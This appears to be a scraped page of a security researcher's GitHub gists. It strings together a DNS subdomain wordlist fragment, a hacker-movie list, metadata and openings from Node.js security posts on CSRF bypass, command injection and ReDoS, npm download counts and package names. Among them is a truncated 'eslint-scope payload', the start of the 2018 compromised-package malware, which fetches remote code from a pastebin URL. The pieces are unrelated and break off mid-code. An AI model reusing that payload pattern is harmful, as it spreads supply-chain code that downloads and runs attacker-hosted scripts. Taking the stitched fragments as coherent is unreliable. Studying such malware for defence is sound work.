Adam Baldwin evilpacket

evilpacket / all.txt
Created December 12, 2020 00:28 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
.
..
........
@
*
*.*
*.*.*
🐎
URLs people tried (so far): https://gist.github.com/evilpacket/6651547a3d3e39bef75eee35f321f25f
Flag 1:
1. @jstash
2. @cnelson
3. @JF0LKINS
Flag 2:
1.
(Swedish) Girl with a dragon tattoo
Hackers
WarGames
Antitrust
Swordfish
TRON
Sneakers
Joe Dante's Explorers (1985)
The imitation game
The KGB, the computer, and me
date: Wed Jan 14 17:30:08 PST 2015
slug: the-dangers-of-square-bracket-notation
tags: security, node.js, javascript, hapi, RCE, square bracket notation, io.js
title: The Dangers of Square Bracket Notation
author: Jon Lamendola
type: text

In this post we are going to look at some peculiar and potentially dangerous implications of JavaScript's square bracket notation: where you shouldn't use this style of object access and why, as well as how to use it safely when needed.

date: 2013-09-07 17:03:10 GMT
slug: bypass-connect-csrf-protection-by-abusing
tags: CSRF, connect, methodOverride, middleware
title: Bypass Connect CSRF protection by abusing methodOverride Middleware
author: Node Security Team
type: text

Since our platform isn't set up for advisories that are not specific to a particular module version, but rather a use / configuration of a certain module, we will announce this issue here and get it into the database at a later date.

date: 2014-08-19 17:04:34 GMT
slug: Avoid-Command-Injection-Node.js
tags: security, node.js, injection
title: Avoiding Command Injection in Node.js
author: Adam Baldwin
type: text

date: Mon Nov 03 8:00:00 PDT 2014
slug: regular-expression-dos-and-node.js
tags: security, node.js, redos
title: Regular Expression DoS and Node.js
author: Adam Baldwin
type: text

Imagine you are trying to buy a ticket to your favorite JavaScript conference, and instead of getting the ticket page, you get a 500 Internal Server Error. For some reason the site is down. You can't do the thing that you want to do most, and the conference is losing out on your purchase, all because the application is unavailable.

evilpacket / build.js
Created July 13, 2018 00:31
eslint-scope payload
try {
  var https = require("https");
  https
    .get(
      {
        hostname: "pastebin.com",
        path: "/raw/XLeVP82h",
        headers: {
          "User-Agent":
            "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
ws: 18300469
fsevents: 17784701
gaze: 11832681
node-sass: 8865218
bson: 2686185
uws: 2360991
dtrace-provider: 1567984
pg: 1407674
grpc: 1137348
iltorb: 932043
17monip
2wire
3000
3drotate
51degrees
64
7lab_groove_test
7zjs
@a-sync/opencv4nodejs
@achingbrain/node-syslog